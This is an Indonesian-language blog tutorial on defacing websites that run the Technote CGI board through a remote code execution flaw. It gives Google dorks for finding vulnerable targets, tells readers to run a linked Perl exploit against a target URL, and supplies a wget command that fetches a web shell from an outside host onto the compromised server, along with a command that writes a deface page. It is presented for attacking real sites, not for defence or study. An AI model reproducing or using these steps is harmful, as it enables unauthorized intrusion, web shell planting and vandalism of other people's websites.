Deface poc RCE(Remote Execution Code) Technote
mazapip.blogspot.com - Tutorial deface technote RCE(Remote Code Execution)0.4, Halo Gaes Balik Lagi Sama Gua maz apip. pada hari yang cerah ini gua akan share atau berbagi tentang cara deface RCE (REMOTE CODE EXECUTION) yang ada di bugnya technote itu sendiri hehe, disini tools yg di pake menggunakan bahasa perl untuk exploitnya. dan google untuk ngedorkingnya langsung saja tutorialnya
ignore this keyword
Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4
Bahan - Bahan:
- Smartphone atau Pc bisa juga desktop
- termux atau cmd untuk menjalankan exploitnya
- dork
- Exploit RCE DISINI
ignore this keyword
Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4
DORK:
- Bisa pake Bing dorker buatan mimin atau ngedork manual pake dork bibawah ini
- inurl:/cgi-bin/technote/
- inurl:".cgi?board=FREE_BOARD"
- intext:"TECHNOTE-TOP"
www.site.com/main.cgi?board=FREE_BOARD
copy paste dulu exploit rce yang ada di atas ke notepad atau text editor lainya. lalu save menjadi exploit.pl
untuk user termux bisa ketik nano expoit.pl lalu paste,setelah itu CTRL+X lalu Y lalu enter
untuk user windows download perl manual,untuk user termux bisa pake command ini
$pkg install perl
sudah? sekarang buka cmd/termux kalian masing masing.
setelah terminal/cmd terbuka kalian ketikan perintah di bawah ini .
$ perl exploit.pl http://www.sitetarget.com/blabla/main.cgi?board=FREE_BOARDkalau vuln maka akan terlihat seperti gambar dibawah ini.
lalu bagaimana cara upload Shell nya?
kalian bisa pakai command
wget -O linkshell.com/shell.txt Shell.php
jika tidak dapat upload Shell,kalian bisa memakai commad ini
php "Heked Bay" > p.php
ignore this keyword
Deface poc RCE(Remote Execution Code) Technote
Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4